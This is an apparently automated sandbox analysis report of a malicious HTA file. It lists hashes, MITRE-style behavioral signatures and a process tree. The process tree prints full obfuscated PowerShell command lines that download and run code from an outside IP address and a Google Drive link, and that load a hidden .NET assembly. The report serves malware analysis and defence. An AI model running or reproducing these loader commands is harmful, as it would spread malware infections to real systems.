Analysis
Max time kernel: 117s
Max time network: 122s
Platform: windows7_x64
Resource: win7-20240708-en
Resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
Submitted: 23-10-2024 06:01
Static task: static1
Behavioral task: behavioral1
  Sample: logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
  Resource: win10v2004-20241007-en
General
Target: logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
Size: 130KB
MD5: 16e67de00d1302e9720892be8ab6a06c
SHA1: 8e8ee3df01c4fb6efd9a5289f48b9795c2483063
SHA256: 4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662
SHA512: fe6d68bc44f8b2243e1f02e77bf4c39c1ddfe4b2c0ccbf2051da7d10641d06b1da5756e1e89806c09cdad06ea9ca4074a18e98416ece919dbdda55e530a19b0a
SSDEEP: 96:Eam7B6DJU946WJU92EYDF/9MM9/y80636sJU956t7T:Ea2wDJGWJtEYpJqsJtRT
Malware Config
Extracted:
  https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  3     2692  POWeRShEll.exe
  6     2888  powershell.exe
  8     2888  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  pid   Process
  2056  powershell.exe
  2888  powershell.exe

Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  2692  POWeRShEll.exe
  2548  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  5     drive.google.com
  6     drive.google.com

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  POWeRShEll.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe

Modifies Internet Explorer settings
  description  ioc                                                                                                    Process
  Key created  \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid   Process
  2692  POWeRShEll.exe
  2548  powershell.exe
  2692  POWeRShEll.exe
  2692  POWeRShEll.exe
  2056  powershell.exe
  2888  powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2692  POWeRShEll.exe
  Token: SeDebugPrivilege  2548  powershell.exe
  Token: SeDebugPrivilege  2056  powershell.exe
  Token: SeDebugPrivilege  2888  powershell.exe

Suspicious use of WriteProcessMemory (28 IoCs; each of the 7 rows below is reported 4 times)
  description                          pid   Process         procid_target
  PID 2644 wrote to memory of 2692     2644  mshta.exe       30
  PID 2692 wrote to memory of 2548     2692  POWeRShEll.exe  32
  PID 2692 wrote to memory of 3024     2692  POWeRShEll.exe  33
  PID 3024 wrote to memory of 796      3024  csc.exe         34
  PID 2692 wrote to memory of 2036     2692  POWeRShEll.exe  36
  PID 2036 wrote to memory of 2056     2036  WScript.exe     37
  PID 2056 wrote to memory of 2888     2056  powershell.exe  39
Processes

Level 1: C:\Windows\SysWOW64\mshta.exe (PID 2644)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe (PID 2692)
    Command line: "C:\Windows\sYSTEM32\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe" "poWERSheLl.exE -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT ; IEX($(Iex('[sySTEM.tEXT.EnCODIng]'+[Char]0X3A+[cHAR]58+'utF8.geTsTRINg([SYStem.coNverT]'+[char]0X3A+[Char]0X3A+'FrombaSE64sTRInG('+[char]34+'JDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQkVyZGVmSW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZU9odnlRR28sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBabnF2ekZSdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF3QnJheXl5LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBycEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1QlMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRldOQnIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYWxBbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzQzL25ld3RoaW5nc3dpdGhncmVhdGZ0dXJ1ZXdpdGhncmVhdGRheXdlbGxiZXR0ZXJmb3JtZS50SUYiLCIkZU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMiLDAsMCk7c3RBclQtU0xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMi'+[chAr]0X22+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2548)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    Level 3: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 3024)
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fn37zcet.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 796)
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB7F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFB7E.tmp"
        - System Location Discovery: System Language Discovery

    Level 3: C:\Windows\SysWOW64\WScript.exe (PID 2036)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      Level 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2056)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        Level 5: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2888)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:coMSPEC[4,15,25]-jOin'')((('gUdimageUrl = G5Ihttps://drive.g'+'oogle.com/uc?export=download&id=1AIVgJJ'+'Jv1F6vS4sUOybnH-sD'+'vUhBYwur G5I;gUdwebClient = New-Object System.Net.WebClien'+'t;gUdima'+'geBytes = gUdwebClie'+'nt.DownloadData(gUdimageUrl);gUdimageText = [System.Text.Encoding]::UTF8.GetString(g'+'UdimageBytes);gUdstartFlag = G5I<<BASE64_START>>G5I;gUdendFlag = G5I<<BASE64_END>>G5I;gUdstartIndex = gUdimageText.IndexOf(gUdstartFlag);gUdendIndex = gUdi'+'mageText.IndexOf(gUdendFlag);gUdstartIndex -ge 0 -and g'+'U'+'dendIndex -gt gUdstartInd'+'ex;gUdst'+'artIndex += gUd'+'startFlag.Length;gUdbase64'+'Length = gUdendIndex - gUd'+'startIndex;gUdbase64Comma'+'nd = gUd'+'imageText.Substring'+'(gUdstar'+'tIndex, '+'gUdbase64Length);gUdbase64Reversed '+'= -join (gUdbase64Command.'+'ToCharArray() WBX ForEach-Object { gUd_ })[-1..-(gUdbase64Command.Length)];gUdcommandByt'+'es = [System.Convert]::FromBase64String(gUdbase64Reversed'+');gUdloadedAssembly = [System.Reflection.Assembly'+']::L'+'oad(gUdcommandBytes);gUdvaiMethod = [dnlib.IO.Home].GetMethod(G5'+'IVAIG5'+'I);gU'+'dvaiMethod.Invoke(gUdnull, @(G5Itxt.RFDDRC'+'L/34/141.671.3.291//:ptthG5I, G5Ides'+'ativadoG5I, G5Idesativa'+'doG5I, G5IdesativadoG5I, '+'G5ICasPolG5I, G5IdesativadoG5I, G5IdesativadoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G5Idesativ'+'adoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G'+'5I1'+'G5I,'+'G5Idesativ'+'adoG5I));') -cRePLACE 'G5I',[CHar]39 -cRePLACE'gUd',[CHar]36-cRePLACE ([CHar]87+[CHar]66+[CHar]88),[CHar]124))"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
  MD5: a07e96bb33a12aa9d272cd6d75ce006e
  SHA1: ee28d46528aa51cfe07a4d28bd3b5cfae27fcc01
  SHA256: e96422f584eb2ae13f977c82d7d74a956a0a340b8817233988ba8280e5c9e1f0
  SHA512: 1cf8c06cd03bcf1bbcb984c7b745fe9c69240c22af884f798d821b3dc6573bd0aca9005496276b3c24b62e3a0bcb184e6d7052b8b4004f4fe94abb506d39f591

Filesize: 3KB
  MD5: e6e5e0d1576a5f5e093770e6e05b6849
  SHA1: dcadf615f6c9761b5f48cd93f4477b0300462003
  SHA256: 65bf786c4d99f3cf501002bfad7f6a9e3690580191233554cb01a1d8b55e05f7
  SHA512: cf880ec7957f8a3dfcfe47cf28d7a3a855b6b467055b5434c9255f78505103af4d07a289c0584f51943d049501a190440b7b02e08f9c62ff670f73b67d962b8f

Filesize: 7KB
  MD5: 4899363f665cb06421bda10424da6855
  SHA1: b86ea1aa41d9515fa6b03f808024bdc63558ed74
  SHA256: b4b83ea28a78673d5bf444a7ac17af3aac0b75fde5eda5f89054d8fc3e9087f1
  SHA512: 790a063d162a17713b30bfd0a10a984920601369ab6a780983223717862738443455431b7ecdc5eff58b330a5d9e432d4f7f18b94816019e80f34d4ae53fe882

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 581f4a0c418351c81eb278f1eab0315b
  SHA1: b28c851702578d78bddb9fb50717b1026f037755
  SHA256: 83da60531d570c549dfa0d792d8d58703001040562d6ae7d9f21ecf14e279e98
  SHA512: fbefe9b95e2d522a426ce013f3b3f4da23148882cf08195a534a823a33282bc55eedf67fdd9c415f2a65d2c1250f60f5456cefe69a7cdb9b36c540569d36139d

Filesize: 136KB
  MD5: 655d556c1a60114b9c1df43ca2d1b4e9
  SHA1: c339a1fb6445b5a5701ef091b328727d2e0cd894
  SHA256: 8895b5c34239ed56abf05b8a381be9153b25baea8167aafceafec196375cd983
  SHA512: 5bcb9c205e7337199e6f7c8e261fe83d1202e6d0aa084648d6d3c00e4c970d47fdbb759494e9c1b9b0347d23d24c4fd561fea17247fec9c81ca3b124b09263ba

Filesize: 652B
  MD5: 4d6447dc7f4408339737a71f748e2a28
  SHA1: 2ed10389a8e6977cf4013925ca4c04b5c92bebc0
  SHA256: 49d6d1f7e59de8e03d9f125b170467a559481891a44bd7bc4854bda0a5c089ef
  SHA512: 196c1e1ec501bed198574d00761e8c279d1dce672fae54cdd7e2bddc288d93adf5a19b9ad5342f78481a667ed0fba52de6d43c497de787bd3dc27998650d5d89

Filesize: 469B
  MD5: b89fa3ea83594e6aed2a1cbc2ab03515
  SHA1: 2457f05ae6c56c192ad5d7c76694e7898ada53f8
  SHA256: bd9c1570cad7cf95c39fa2a8be51a8851239e7f5cbf0bad032292f733fded0a0
  SHA512: bf0334f84f3de804f868d3b447eaf98e9d6679b52015ac814cb8d71e2d3fdc90f482bfe5f2801f25a5bef0de53da747028e3d28149ac5fd5ec3cc835ca8c37aa

Filesize: 309B
  MD5: f55bfae65f697c4829e40e94a639a245
  SHA1: e293f5ed3125aa348a82a934449676bf44ee6849
  SHA256: 9cc8a4747d62f72c63f4931dcd9b514a7a94a61f4150210538b1892efc9792da
  SHA512: 539f22638b7a527e877b2b9e35ba15eafd8ba0babfff9bc7558287fb486d930ec5e65afaab2e4e0438484952da96a640bc34f9d82305c2257a5fc6c40f923065